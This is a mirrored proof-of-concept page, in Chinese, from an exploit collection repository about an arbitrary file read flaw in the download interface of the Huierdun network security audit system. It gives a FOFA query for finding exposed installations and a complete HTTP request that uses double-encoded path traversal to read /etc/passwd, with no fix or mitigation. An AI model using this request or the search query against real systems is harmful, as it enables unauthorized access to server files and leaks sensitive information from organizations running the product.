mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
32 lines
1.6 KiB
Markdown
32 lines
1.6 KiB
Markdown
|
# 惠尔顿安全审计系统download任意文件读取漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
对于军民融合政策的诸多中小企业来讲,大部分人员主要时间都时在非涉密区工作,并需要用到网络, 所以上网时不小心泄密成了一个可能泄密的高概率事件。 惠尔顿 通过 三员化管理、实名认证上网、网页记录、 邮件审查、文件上传下载、即时通讯、防私接、统计报表 等八大方面确保上网不泄密。惠尔顿网络安全审计系统download接口处存在任意文件读取漏洞,恶意攻击者可能会利用此漏洞获取服务器敏感信息,从而造成信息泄露。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 惠尔顿安全审计系统
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ fofa`app="惠尔顿-网络安全审计系统"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Connection: close
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:57:11
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbrwp07p75ysgyvt>
|